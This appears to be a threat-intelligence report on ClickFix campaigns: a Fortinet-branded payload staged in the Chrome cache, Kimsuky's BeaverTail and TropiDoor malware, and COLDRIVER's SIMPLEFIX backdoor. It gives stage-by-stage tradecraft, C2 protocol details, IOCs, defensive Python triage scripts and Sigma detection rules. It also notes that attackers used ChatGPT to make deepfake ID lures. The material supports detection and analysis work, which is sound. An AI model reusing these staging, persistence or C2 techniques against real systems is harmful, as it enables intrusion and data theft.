Introduction
Operation Black Mirror reveals a strategic shift in adversary tradecraft: the weaponization of ClickFix as a delivery model for state-aligned operations. What began as a simple, user-driven execution trick has evolved into a reliable intrusion vector adopted by multiple APT groups, each shaping it to fit their own workflow: from lure-driven credential theft, to seamless initial access, to full operational takeover.
Attack Chain Overview
⚠️ Important Insight
ClickFix operates as a modular pipeline: lure kit → delivery host → loader → final payload. The kit style is opinionated (consistent copy, layout blocks, link/button semantics), making it ideal for infrastructure-driven hunting beyond single IOCs.
Lure themes:
- Account locked / verification required
- Invoice / payment failure
- Parcel delivery correction
Delivery and loader:
- HTML/HTM dropper → ZIP
- JS/VBS/HTA → LOLBAS (wscript, mshta, rundll32)
- Signed binary side-loads
Final payload and objective:
- Infostealers
- RAT deployment for persistence
- Credential/session exfil → resale
Fortinet Case
In this campaign, the operators weaponize the Fortinet brand to deliver a FileFix-style payload through a ClickFix pattern. The victim is guided to run a single PowerShell command via Win+R; everything else happens silently: a payload is staged in the browser cache, reconstructed on disk under a fake FortiClient compliance folder, and executed with scheduled persistence and command-and-control traffic.
1. Redirect Chain & Fortinet-Branded Landing
The victim starts by visiting a lure URL that performs multiple redirects before resolving to a Fortinet-themed “security” page. The final landing mimics a legitimate FortiClient compliance notification and warns about an issue that must be fixed immediately.
2. Embedded JavaScript & Cache Priming
Inspection of the page source reveals an embedded JavaScript block. Once deobfuscated, the logic is concise: it calls fetch() on a GUID-like path such as /5b900a00-71e9-45cf-acc0-d872e1d6cdaa, then reads the response as a binary blob() and logs the message "Image forcée en cache" (“image forcibly cached”) to the console.
3. PowerShell One-Liner & Local Reconstruction
The page eventually exposes the core of the ClickFix technique: a single, oversized PowerShell command accompanied by precise user instructions (Win+R → paste → execute). There is no exploit, no vulnerability abuse, no privilege trick. The victim themselves becomes the attacker’s execution environment.
Once invoked, the command chain runs in complete silence, stitching together a sequence of tightly scoped operational stages. Each step reconstructs, stages, and ultimately launches the payload without producing any visible artifact on screen, delivering all functionality through invisible background execution.
Stage I — Silent Execution
A hidden PowerShell session spawns through conhost.exe. No window and no on-screen evidence: the script runs fully interactively yet remains completely invisible within the user’s session.
Stage II — FortiClient Mirage
The script assigns $k to the faux compliance path %LOCALAPPDATA%\FortiClient\compliance. Even on hosts without Fortinet installed, this structure perfectly impersonates a legitimate FortiClient directory.
Stage III — Cache Harvesting
The variable $d points to Chrome’s cache: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\Cache_Data\. Everything under this path is copied into $k, effectively pulling the staged payload out of browser cache.
Stage IV — Marker-Based Extraction
Each copied file is decoded via [System.Text.Encoding]::Default.GetString(). The script identifies hidden data between two markers: bTgQcBpv and mX6o0lBw, treating the enclosed segment as the embedded payload.
Stage V — ComplianceChecker.zip
The reconstructed payload is written to $k\ComplianceChecker.zip. Using Expand-Archive, the archive expands into a weaponized file set located quietly in the compliance folder.
Stage VI — Activation
The script then launches FortiClientComplianceChecker.exe. A payload that began as an opaque Chrome cache blob now executes under the guise of a Fortinet compliance tool.
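For responders working this case, the marker pair gives a concrete hunt: any Chrome cache entry that carries data between bTgQcBpv and mX6o0lBw is a staged payload. The following is an added Python triage script, not the attacker’s PowerShell and not a Fortinet tool; it scans a Cache_Data directory, hashes the embedded segment and checks for a ZIP header without unpacking or running anything, and the sample it builds for its own demo is a constructed, inert stand-in.

```python
import hashlib
import os
import tempfile
from typing import Iterator, List, Optional

# Marker strings the write-up reports around the embedded payload.
START_MARKER = b"bTgQcBpv"
END_MARKER = b"mX6o0lBw"
ZIP_MAGIC = b"PK\x03\x04"  # local-file header that Expand-Archive expects


def extract_between_markers(data: bytes) -> Optional[bytes]:
    """Return the bytes enclosed by the marker pair, or None if absent.

    Working on raw bytes sidesteps the lossy Default.GetString() round-trip
    the attacker script performs; for ASCII markers the offsets are the same.
    """
    start = data.find(START_MARKER)
    if start == -1:
        return None
    start += len(START_MARKER)
    end = data.find(END_MARKER, start)
    if end == -1:
        return None
    return data[start:end]


def iter_cache_files(cache_dir: str) -> Iterator[str]:
    """Yield every file under a Chromium Cache_Data directory."""
    for root, _dirs, files in os.walk(cache_dir):
        for name in files:
            yield os.path.join(root, name)


def scan_cache_for_staged_payload(cache_dir: str) -> List[dict]:
    """Triage a browser cache directory for marker-delimited payloads.

    One finding per hit: path, embedded segment size, SHA-256 of the segment
    (shareable as an IOC) and whether it starts with a ZIP header. Nothing is
    written to disk or executed; extraction is for analysis only.
    """
    findings = []
    for path in iter_cache_files(cache_dir):
        try:
            with open(path, "rb") as fh:
                blob = fh.read()
        except OSError:
            continue  # entries can be locked or evicted while the browser runs
        segment = extract_between_markers(blob)
        if segment is None:
            continue
        findings.append({
            "path": path,
            "size": len(segment),
            "sha256": hashlib.sha256(segment).hexdigest(),
            "looks_like_zip": segment.startswith(ZIP_MAGIC),
        })
    return findings


def demo_on_constructed_sample() -> List[dict]:
    """Build a throwaway cache directory holding a constructed, inert sample
    (marker-wrapped ZIP header plus zero filler, not real malware) and scan it."""
    tmp = tempfile.mkdtemp(prefix="cache_triage_")
    fake_zip = ZIP_MAGIC + b"\x00" * 20
    with open(os.path.join(tmp, "f_000001"), "wb") as fh:
        fh.write(b"\x89PNG\r\n" + START_MARKER + fake_zip + END_MARKER + b"\xff\xff")
    with open(os.path.join(tmp, "f_000002"), "wb") as fh:
        fh.write(b"ordinary cache entry without markers")
    return scan_cache_for_staged_payload(tmp)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_cache_for_staged_payload(target) if target else demo_on_constructed_sample()
    for hit in results:
        print(hit)
```

Point it at a copied %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\Cache_Data\ tree from a forensic image rather than the live profile.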
4. Masquerade & User-Facing Behavior
If we take a closer look at FortiClientComplianceChecker.exe, it quickly becomes clear that it is not a legitimate Fortinet component. The executable carries the icon of Greenshot, a well-known screenshot utility, rather than the icon used by the genuine FortiClient installer. Examining the file properties further confirms the discrepancy: its original filename is reported as Greenshot.exe, indicating that the binary was repurposed and rebranded rather than built by Fortinet.
When executed, the binary displays a Fortinet-themed message box, then exits without obvious visual artefacts such as desktop shortcuts. To the user, it looks like a harmless one-time compliance scan that completed successfully.
5. Persistence & Command-and-Control
A quick look inside Task Scheduler exposes the operator’s actual objective. After execution, FortiClientComplianceChecker.exe quietly plants a scheduled task designed to guarantee continuity: it relaunches the same binary every day at 10:00, with additional triggers firing every four hours throughout the next 24-hour window. What looks like a benign compliance helper behaves like a classic persistence implant.
Monitoring TCP/IP activity with tools such as Process Explorer exposes the next phase of the operation: the binary initiates outbound communication to 20.105.216[.]35. Capturing the network stream with Fiddler Classic confirms a steady outbound flow from the fake compliance checker—evidence of an active command-and-control channel.
Inside the compliance directory, new artifacts begin to surface — including update.dll. Static inspection tools such as PEStudio reveal two exports: Starter and DllMain.
The Starter routine is responsible for spawning additional scheduled tasks, each pointing back to FortiClientComplianceChecker.exe within the same directory — all without verifying that the executable is legitimate or even present. A self-referential loop of persistence is formed, reinforcing the operator’s foothold.
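The persistence just described (a task relaunching a binary from the fake compliance folder every day at 10:00 with a four-hour repetition) can be audited from exported task definitions. The following is an added Python example, not the page’s or any vendor’s tool; it assumes tasks were exported with `schtasks /query /tn <name> /xml`, models the four-hour cadence as a Repetition block (separate triggers would be checked the same way), and both embedded XML documents are constructed samples, not real captures.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Executable locations that should never back a scheduled task on a managed
# host: the fake compliance folder from this chain, and any user-writable
# AppData tree more generally.
SUSPICIOUS_PATHS = [
    re.compile(r"\\FortiClient\\compliance\\", re.IGNORECASE),
    re.compile(r"(%LOCALAPPDATA%|\\AppData\\(Local|Roaming))\\", re.IGNORECASE),
]


def audit_task_xml(xml_text: str) -> dict:
    """Inspect one exported task definition.

    Reports every Exec action command, those living in a suspicious path, and
    whether a daily calendar trigger carries a four-hour repetition (PT4H),
    the cadence described for this implant.
    """
    root = ET.fromstring(xml_text)
    commands = [
        (cmd.text or "").strip()
        for cmd in root.findall(".//t:Actions/t:Exec/t:Command", TASK_NS)
    ]
    suspicious = [c for c in commands if any(p.search(c) for p in SUSPICIOUS_PATHS)]
    four_hour_daily = False
    for trig in root.findall(".//t:Triggers/t:CalendarTrigger", TASK_NS):
        interval = trig.findtext("t:Repetition/t:Interval", default="", namespaces=TASK_NS)
        daily = trig.find("t:ScheduleByDay", TASK_NS) is not None
        if daily and interval.upper() == "PT4H":
            four_hour_daily = True
    return {
        "commands": commands,
        "suspicious_commands": suspicious,
        "daily_with_4h_repetition": four_hour_daily,
        "flag": bool(suspicious),
    }


# Constructed sample modelled on the behaviour described above; not a real
# export from an infected host.
IMPLANT_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-10-14T10:00:00</StartBoundary>
      <Repetition><Interval>PT4H</Interval><Duration>P1D</Duration></Repetition>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\victim\\AppData\\Local\\FortiClient\\compliance\\FortiClientComplianceChecker.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# A benign daily task from Program Files, for contrast (also constructed).
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-10-14T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\\Program Files\\Fortinet\\FortiClient\\FortiClient.exe</Command></Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml_text in (("implant", IMPLANT_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, audit_task_xml(xml_text))
```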
6. Why This Fortinet Case Matters
This Fortinet-branded incident is a clean illustration of how ClickFix bypasses traditional email and attachment-based controls. There is no exploit in the classic sense, only adversarial UX design and a single user-assisted command that rebuilds a payload from browser artifacts.
Clickfix Campaigns
⚠️ ClickFix: User-Driven Execution as an APT Weapon
The ClickFix technique, used by groups such as Kimsuky and COLDRIVER, is a highly effective form of social engineering that turns victims into the execution layer of the attack. The method involves guiding users to a malicious webpage disguised as a legitimate login, job evaluation, or Cloudflare-style CAPTCHA, then instructing them to manually run a PowerShell command through Win+R.
COLDRIVER leverages ClickFix to deploy backdoors such as SIMPLEFIX against Russian civil society members, journalists, and human-rights defenders. The resulting malware enables reconnaissance and theft of sensitive files, including .pdf, .doc, and .zip documents.
North Korean operators, including Kimsuky, continue to adopt ClickFix due to its reach and simplicity. It allows the distribution of compiled malware families such as BeaverTail to less technical victims across cryptocurrency and retail sectors: targets unlikely to possess development tools.
COLDRIVER additionally applies stealth techniques by clearing the RunMRU registry key, erasing evidence of the user-typed malicious command and reducing forensic visibility.
Kimsuky
🔍 Kimsuky / APT43 Tactical Evolution
The Kimsuky hacking group, linked to the North Korea–aligned threat actor APT43, has recently been connected to campaigns that highlight a rapid evolution in tradecraft. Their operations now move along two coordinated fronts:
1. Abuse of legitimate platforms. Kimsuky leverages GitHub repositories as remote infrastructure for stealer malware delivery. Malicious .lnk files hidden inside ZIP archives execute PowerShell scripts that gather sensitive metadata (running processes, host configuration, and system details) before uploading the stolen data to attacker-controlled GitHub repositories.
2. Deepfake-enhanced social engineering. In spear-phishing campaigns aimed at researchers, defense-sector personnel, journalists, and human-rights advocates focused on North Korean affairs, Kimsuky abused OpenAI’s ChatGPT to generate realistic deepfake military ID cards. These serve as lures in attack chains that mimic ClickFix-style CAPTCHA verification pages, ultimately delivering malware designed for data theft and remote control, marking a major expansion in Kimsuky’s psychological and technical deception capabilities.
🔍 BeaverTail Malware: JavaScript Loader for InvisibleFerret
BeaverTail is a JavaScript malware strain most commonly propagated through malicious or manipulated NPM packages. Designed for credential theft and multi-stage malware delivery, BeaverTail focuses heavily on extracting cryptocurrency wallet data and credit card information from the victim’s web browser.
Its primary function is to deploy InvisibleFerret, a multi-stage, Python-based backdoor that grants adversaries persistent remote access. The BeaverTail payload is aggressively obfuscated to hinder detection and analysis.
Distribution typically involves uploading weaponized NPM packages to GitHub or injecting BeaverTail code into trusted repositories and open-source components. The discovery of Windows and macOS variants indicates that the malware family is still under development and expanding its platform reach.
TropiDoor RAT: Multi-Stage Final Payload with FNV-Based API Resolution
TropiDoor is an advanced HTTP/S Remote Access Trojan written in C, exhibiting notable code overlap with the PostNapTea malware family. Deployed in November 2024, TropiDoor was delivered via fake recruiter social engineering operations targeting developers. Victims were lured into downloading trojanized open-source projects distributed on platforms such as Bitbucket. TropiDoor served as the final-stage payload in a multi-step infection chain that also deployed an obfuscated BeaverTail variant.
The RAT communicates with its C2 server via encrypted HTTP POST traffic, using RSA and AES for confidentiality. Its traffic is distinguished by POST parameters such as tropi2p, gumi, s_width, and letter, with tropi2p loosely inspiring the malware’s name.
TropiDoor stores configuration data in a compact binary format and dynamically resolves required Windows APIs using the Fowler–Noll–Vo (FNV) hashing algorithm. Many of its strings are XOR-obfuscated, adding resistance to static analysis.
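Because TropiDoor resolves imports by hash, the practical reversing aid is a hash-to-name table built from the export lists of the DLLs a sample loads, so the constants found in the binary can be named. This is an added Python example, not the malware’s code; the page does not state which FNV flavour (FNV-1 or FNV-1a, 32- or 64-bit) or case handling the sample uses, so all four are built and the export list here is a constructed sample.

```python
from typing import Dict, Iterable, List, Tuple

# (prime, offset basis, mask) for the two standard FNV widths.
FNV_PARAMS = {
    32: (0x01000193, 0x811C9DC5, 0xFFFFFFFF),
    64: (0x100000001B3, 0xCBF29CE484222325, 0xFFFFFFFFFFFFFFFF),
}


def fnv1(data: bytes, bits: int = 32) -> int:
    """Classic FNV-1: multiply by the prime, then XOR in the next byte."""
    prime, h, mask = FNV_PARAMS[bits]
    for b in data:
        h = (h * prime) & mask
        h ^= b
    return h


def fnv1a(data: bytes, bits: int = 32) -> int:
    """FNV-1a: XOR in the next byte, then multiply (the more common variant)."""
    prime, h, mask = FNV_PARAMS[bits]
    for b in data:
        h ^= b
        h = (h * prime) & mask
    return h


VARIANTS = {
    "fnv1-32": lambda s: fnv1(s, 32),
    "fnv1a-32": lambda s: fnv1a(s, 32),
    "fnv1-64": lambda s: fnv1(s, 64),
    "fnv1a-64": lambda s: fnv1a(s, 64),
}

# Constructed sample export list. In practice, feed the full export tables of
# the DLLs the sample loads (kernel32, wininet, advapi32, ...), e.g. via pefile.
SAMPLE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateProcessW",
    "InternetOpenA", "HttpSendRequestA", "RegSetValueExW", "CryptEncrypt",
]


def build_hash_table(names: Iterable[str], variant: str = "fnv1a-32") -> Dict[int, str]:
    """Map hash -> API name for one FNV variant (names hashed as exported ASCII)."""
    h = VARIANTS[variant]
    return {h(n.encode("ascii")): n for n in names}


def resolve_hash(value: int, names: Iterable[str] = SAMPLE_EXPORTS) -> List[Tuple[str, str]]:
    """Try every variant against one constant lifted from the binary.

    A value that hits in exactly one table tells you both the API and which
    FNV flavour the sample uses; once known, stick to that single table.
    """
    names = list(names)
    out = []
    for variant in VARIANTS:
        name = build_hash_table(names, variant).get(value)
        if name is not None:
            out.append((variant, name))
    return out


if __name__ == "__main__":
    # Pretend this constant was lifted from a disassembly listing.
    unknown = fnv1a(b"VirtualAlloc", 32)
    print(hex(unknown), resolve_hash(unknown))
```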
BeaverTail & TropiDoor: Coordinated Multi-Stage Malware Suite
⚔️ BeaverTail & TropiDoor — A Unified Kill Chain
BeaverTail and TropiDoor operate together as a tightly integrated intrusion suite used by North Korean threat actors. BeaverTail initiates execution, stealing browser-stored data and deploying secondary payloads, while TropiDoor establishes an encrypted in-memory backdoor to maintain long-term access and remote control. Together, they form a complete compromise ecosystem: BeaverTail steals, stages, and delivers; TropiDoor controls, persists, and commands.
🐾 BeaverTail — JavaScript Infostealer & Loader
BeaverTail is a JavaScript malware family distributed through malicious or trojanized NPM packages. It functions as both an infostealer and a loader, often disguised as a file named tailwind.config.js.
🐾 Execution Initiation
BeaverTail is embedded inside project repositories, frequently masquerading as tailwind.config.js. The file contains a heavily obfuscated JavaScript routine designed to evade casual inspection and static detection.
🜂 Downloader Activation
Once executed, the obfuscated logic activates a native downloader—most notably car.dll—located in the same directory, shifting execution from JavaScript into compiled code.
🕵️ Infostealer Focus
BeaverTail targets web browsers to extract credentials, payment card data, and cryptocurrency wallet information, focusing on wallet extensions and stored secrets in browser profiles.
📦 Downloader Functions
The malware leverages tools such as curl to retrieve additional payloads, including archives named p.zi and p2.zip, which contain later-stage components.
📤 Exfiltration & Loader Role
BeaverTail both uploads exfiltrated data and downloads secondary malware such as the Python-based backdoor InvisibleFerret, acting as a staging mechanism for full compromise.
🌐 Cross-Platform Evolution
The identification of Windows and macOS variants suggests that the BeaverTail family remains under active development, with operators investing in multi-platform reach and resilience.
🜂 TropiDoor — Encrypted In-Memory RAT
TropiDoor is an advanced HTTP/S Remote Access Trojan written in C, operating entirely in memory and exhibiting code overlap with the PostNapTea RAT family. It is typically deployed by BeaverTail’s downloader as the final-stage payload in the chain.
🜂 Multi-C2 Connection Attempts
Upon execution, TropiDoor decrypts its configuration and attempts to contact four distinct C2 servers, providing redundancy and resilience against sinkholing or takedown.
🔐 System Profiling & RSA Key Exchange
After establishing a connection, the RAT collects system information and generates a 0x20-byte random key. This key is then encrypted using an RSA public key and transmitted to the C2 as part of its initial handshake.
🧬 Encrypted Session Establishment
The randomly generated key becomes the basis for AES-encrypted packet communication, securing all subsequent C2 traffic from interception and simple inspection.
🌐 Structured HTTP Parameters
TropiDoor uses a structured set of POST parameters to transmit Base64-encoded data: tropi2p for system information, gumi for the encrypted session key, s_width for a random 5-byte Session ID, and letter for commands and their results.
📡 Command Polling & Execution
To receive instructions, TropiDoor sends 400BadRequest in the letter parameter. The C2 responds with commands, and execution results are returned through the same parameter, establishing a simple yet robust C2 loop.
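The beacon shape just described (four Base64-carrying POST parameters, a 5-byte session id in s_width, the 400BadRequest poll in letter) can be turned into a network-side check over captured request bodies. The following is an added Python example, not TropiDoor’s code or any vendor detection; the beacon bodies are constructed with every value invented, and it assumes the C2 traffic is standard application/x-www-form-urlencoded, so Base64 padding and symbols arrive percent-encoded.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs, urlencode

# POST parameter names reported for TropiDoor beacons.
TROPIDOOR_PARAMS = {"tropi2p", "gumi", "s_width", "letter"}
POLL_TOKEN = b"400BadRequest"   # sent in `letter` when asking for a command
SESSION_ID_LEN = 5              # `s_width` carries a random 5-byte session id


def _b64(value: str) -> Optional[bytes]:
    """Strict Base64 decode; None when the field is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_tropidoor_post(body: str) -> dict:
    """Score one form-encoded POST body against the TropiDoor beacon shape.

    Checks, all drawn from the protocol description: the four parameter names
    are present; s_width decodes to exactly 5 bytes; letter decodes to the
    poll token; gumi (the RSA-wrapped session key) is non-empty Base64.
    """
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    present = TROPIDOOR_PARAMS & set(fields)
    sid = _b64(fields.get("s_width", ""))
    letter = _b64(fields.get("letter", ""))
    gumi = _b64(fields.get("gumi", ""))
    verdict = {
        "params_present": sorted(present),
        "session_id_ok": sid is not None and len(sid) == SESSION_ID_LEN,
        "is_poll": letter == POLL_TOKEN,
        "gumi_is_b64": bool(gumi),
    }
    verdict["score"] = (len(present) + verdict["session_id_ok"]
                        + verdict["is_poll"] + verdict["gumi_is_b64"])
    verdict["match"] = present == TROPIDOOR_PARAMS and verdict["session_id_ok"]
    return verdict


def _enc(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def build_sample_beacon(session_id: bytes) -> str:
    """Constructed poll beacon (every value invented; not a real capture).
    urlencode percent-encodes the Base64 '+', '/' and '=' so parse_qs
    restores them intact, as a real client library would send them."""
    return urlencode({
        "tropi2p": _enc(b"DESKTOP-TEST|10.0.19045|user"),
        "gumi": _enc(b"\x00" * 128),          # stand-in for the RSA blob
        "s_width": _enc(session_id),
        "letter": _enc(POLL_TOKEN),
    })


SAMPLE_POLL = build_sample_beacon(b"\x01\x02\x03\x04\x05")
SAMPLE_BAD_SID = build_sample_beacon(b"\x01\x02")
SAMPLE_BENIGN = "username=alice&password=hunter2&remember=1"

if __name__ == "__main__":
    for name, body in (("poll", SAMPLE_POLL), ("bad_sid", SAMPLE_BAD_SID), ("benign", SAMPLE_BENIGN)):
        print(name, classify_tropidoor_post(body))
```

Because the session key and all later traffic are encrypted, the parameter names, the fixed 5-byte session id and the poll token are the only stable plaintext features to key on; after the handshake, only the field shape remains visible.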
🧩 Extended Backdoor Capability
TropiDoor implements a catalogue of 34 backdoor commands, including file deletion, screenshot capture, process spawning, network configuration inspection, and registry operations. Command #34 is particularly notable, as it embeds direct implementations of Windows utilities such as schtasks, ping, and reg within the malware body—behavior reminiscent of LightlessCan.
🔥 Comparative Analysis: BeaverTail vs. TropiDoor
🧩 Command Handling (TropiDoor)
To receive commands, the malware sends 400BadRequest in the letter parameter to the C2 server. The server responds with instructions, and command execution results are sent back through the same letter parameter, establishing a simple but resilient bidirectional control channel.
Comparative Overview
| Aspect | BeaverTail | TropiDoor |
|---|---|---|
| Nature / Classification | JavaScript malware that functions as both an infostealer and downloader. | An in-memory backdoor (HTTP/S RAT) written in C. |
| Attack Context | Often delivered via phishing and developer-themed lures, such as fake job offers (e.g. LinkedIn) or recruitment emails impersonating platforms like Dev.to. | Deployed as the final payload, operating in memory after being dropped by a downloader such as car.dll. |
| Associated Threat Group | Used by North Korean threat actors in espionage-driven campaigns. | Attributed to the same North Korean ecosystem and used alongside BeaverTail in coordinated operations. |
🐾 BeaverTail — Focus & Observed Traits
🎭 Disguise
BeaverTail was observed masquerading specifically as tailwind.config.js within project files, blending into modern web development tooling and avoiding suspicion from developers.
🎯 Targeting
The malware is highly focused on stealing cryptocurrency wallet data in addition to standard browser credentials, making it particularly impactful in environments where browser-based wallets and extensions are used.
📜 Log Confirmation
Although frequently observed in foreign-focused campaigns, execution logs related to BeaverTail have been confirmed in South Korea, indicating active targeting or collateral exposure in that region.
🜂 TropiDoor — In-Memory Backdoor Characteristics
🧠 In-Memory Operation
TropiDoor executes entirely in memory once deployed by the downloader, significantly reducing artifacts on disk and complicating forensic recovery and traditional endpoint detection.
🧩 Unique Command Behaviour
While most of its 34 documented commands map to common backdoor features such as file deletion, screenshot capture, process execution, and network configuration checks, Command #34 stands out. This command directly implements basic Windows utilities (such as schtasks, ping, and reg) within the code itself, removing the need to call external binaries.
🧪 Technical Similarity
This approach of internally implementing Windows command behaviour, also seen in the associated downloader car.dll, mirrors tradecraft observed in the LightlessCan malware family, further strengthening ties between these toolchains.
🧩 Example — Technical Analysis & Attribution Keys
🔍 Attribution Clue — BeaverTail
The use of curl to download files named p.zi and p2.zip is a well-documented behavior of BeaverTail. This activity serves as a reliable Indicator of Compromise (IOC), helping analysts quickly link the downloader activity to BeaverTail-controlled infrastructure.
🧪 Code Characteristic — TropiDoor
TropiDoor’s Command #34 internally implements basic Windows commands such as schtasks, ping, and reg directly within its own code. This unusual technique mirrors the behavior seen in the associated downloader car.dll and is strongly reminiscent of LightlessCan, providing a valuable link for attribution to related malware families.
Detection & Response Rules — Kimsuky Campaign
The following Sigma-style detection rules are designed to identify key behaviors associated with the Kimsuky campaigns described in this research. They can be adapted to SIEM, EDR, or log analytics platforms to enhance visibility around execution chains, C2 usage, file drops, and registry-based persistence.
🧬 Kimsuky AutoIt Execution Chain
Detects the AutoIt-based execution chain used by Kimsuky, including AutoIt3.exe, HNC-related command-lines and scheduled task creation. This focuses on process creation telemetry and scheduled task abuse for persistence.
```yaml
title: Kimsuky AutoIt Execution Chain
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects Kimsuky campaign AutoIt execution chain
author: Akatsuki Legion
date: 2025/10/14
tags:
  - attack.execution
  - attack.persistence
  - attack.t1059.006
  - attack.t1053.005
logsource:
  category: process_creation
  product: windows
detection:
  selection_autoit:
    - Image|endswith: '\AutoIt3.exe'
    - OriginalFileName: 'AutoIt3.exe'
  selection_hnc:
    CommandLine|contains:
      - 'HncUpdateTray'
      - 'HncUpdate'
  selection_schtasks:
    Image|endswith: '\schtasks.exe'
    # all three substrings must be present; a plain list (OR) would fire on
    # every schtasks /create on the host
    CommandLine|contains|all:
      - '/create'
      - '/tn'
      - 'Hnc'
  condition: (selection_autoit and selection_hnc) or selection_schtasks
falsepositives:
  - Legitimate AutoIt scripts
  - System administration tasks
level: high
```
📡 Kimsuky Discord C2 Communication
Flags Discord-based C2 patterns where processes such as AutoIt3.exe or HncUpdateTray.exe initiate HTTPS connections to discord.com, excluding known legitimate Discord client paths.
```yaml
title: Kimsuky Discord C2 Communication
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
description: Detects Discord webhook usage by Kimsuky malware
author: Akatsuki Legion
date: 2025/10/14
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationHostname|contains: 'discord.com'
    DestinationPort: 443
    # Image is the initiating process field in the Sigma network_connection
    # category (Sysmon event 3)
    Image|endswith:
      - '\AutoIt3.exe'
      - '\HncUpdateTray.exe'
  filter_discord_client:
    Image|contains:
      - '\Discord\\'
      - '\DiscordPTB\\'
      - '\DiscordCanary\\'
  condition: selection and not filter_discord_client
falsepositives:
  - Legitimate Discord usage
level: high
```
📂 Kimsuky File Drop Pattern
Monitors for HncUpdate-related file creation patterns under roaming/local AppData, including config.bin, HncUpdateTray.exe and suspicious .au3 (AutoIt) scripts in user profiles.
```yaml
title: Kimsuky File Drop Pattern
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
description: Detects file drops associated with Kimsuky campaign
author: Akatsuki Legion
date: 2025/10/14
logsource:
  # file_event is the Sigma category for file creation (Sysmon event 11)
  category: file_event
  product: windows
detection:
  selection1:
    TargetFilename|contains:
      - '\AppData\Roaming\HncUpdate\\'
      - '\AppData\Local\HncUpdate\\'
  selection2:
    TargetFilename|endswith:
      - '\config.bin'
      - '\HncUpdateTray.exe'
  selection3:
    TargetFilename|contains: '\AppData\\'
    TargetFilename|endswith: '.au3'
  condition: selection1 or selection2 or selection3
falsepositives:
  - Unknown
level: high
```
🔐 Kimsuky Registry Persistence
Detects Run / RunOnce persistence keys referencing HncUpdate, AutoIt3.exe, or config.bin, commonly used to maintain execution after reboot.
```yaml
title: Kimsuky Registry Persistence
id: d4e5f6a7-b8c9-0123-defa-456789012345
status: experimental
description: Detects registry persistence by Kimsuky malware
author: Akatsuki Legion
date: 2025/10/14
logsource:
  category: registry_event
  product: windows
detection:
  selection:
    TargetObject|contains:
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\'
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\\'
    Details|contains:
      - 'HncUpdate'
      - 'AutoIt3.exe'
      - 'config.bin'
  condition: selection
falsepositives:
  - Legitimate software installations
level: high
```
COLDRIVER — BatchFlix Campaign
The recent cyber espionage campaign attributed to COLDRIVER (also known as Star Blizzard, Callisto, or UNC4057), a Russia-linked advanced persistent threat (APT) group, shows a clear focus on highly targeted intelligence collection against civil society. First identified in September 2025, the operation singled out NGOs, think tanks, independent journalists, and human rights defenders active in the Russian context.
The primary infection vector is the ClickFix social-engineering technique. Victims are lured to a malicious webpage masquerading as a legitimate information resource for Russian civil society. On that page, they are instructed to copy a command and run it via Win + R in the Windows Run dialog. This user-driven execution step triggers the download and loading of a DLL-based downloader named BAITSWITCH.
Once active, BAITSWITCH retrieves and deploys SIMPLEFIX, a PowerShell-based backdoor designed for extended reconnaissance and data theft. SIMPLEFIX enumerates host and network information, then walks user-facing locations such as Documents, Downloads, Desktop, and OneDrive, hunting for files with extensions like .pdf, .doc, and .zip. The overall objective is clear: systematic collection of strategic documents from dissidents and their supporters.
🎯 Target Set
COLDRIVER’s BatchFlix activity focuses on Russian civil society: NGOs, think tanks, investigative journalists, and human rights defenders. The targeting profile underlines a campaign driven by strategic intelligence requirements rather than broad financial crime.
🧠 Initial Access — ClickFix
Victims are redirected to a themed website posing as a resource for civil society in Russia. The page instructs them to run a PowerShell command via the Windows Run dialog, turning the user into the execution environment and aligning with ClickFix-style copy–paste chains.
📥 BAITSWITCH — DLL Downloader
The malicious command loads BAITSWITCH.dll, a downloader that establishes initial contact with attacker infrastructure. BAITSWITCH is responsible for fetching and staging follow-on payloads while keeping the initial infection surface small and user-driven.
🧬 SIMPLEFIX — PowerShell Backdoor
SIMPLEFIX is a PowerShell-based backdoor deployed by BAITSWITCH. It performs host reconnaissance, collects system and network information, and maintains a flexible channel for follow-on tasking. Its codebase is tuned for document discovery and exfiltration.
📂 Data Collection Focus
SIMPLEFIX scans user-centric directories (Desktop, Documents, Downloads, and OneDrive) for high-value document types such as .pdf, .doc, and .zip. This reinforces the campaign’s objective: stealthy collection of strategic and potentially sensitive files from dissidents and their support networks.
| Component | Timeline | Description |
|---|---|---|
| LOSTKEYS | Public disclosure: May 2025 | This malware was used prior to its disclosure. After publication in May 2025, GTIG did not observe any further use of LOSTKEYS, indicating its immediate abandonment by COLDRIVER. |
| COLDCOPY (lure) | Active before May 2025; updated variant from May 2025 onward | The COLDCOPY “ClickFix” lure was originally used to deliver LOSTKEYS. An updated variant of this lure was repurposed to deliver the new malware chain starting just five days after the LOSTKEYS disclosure in May 2025. |
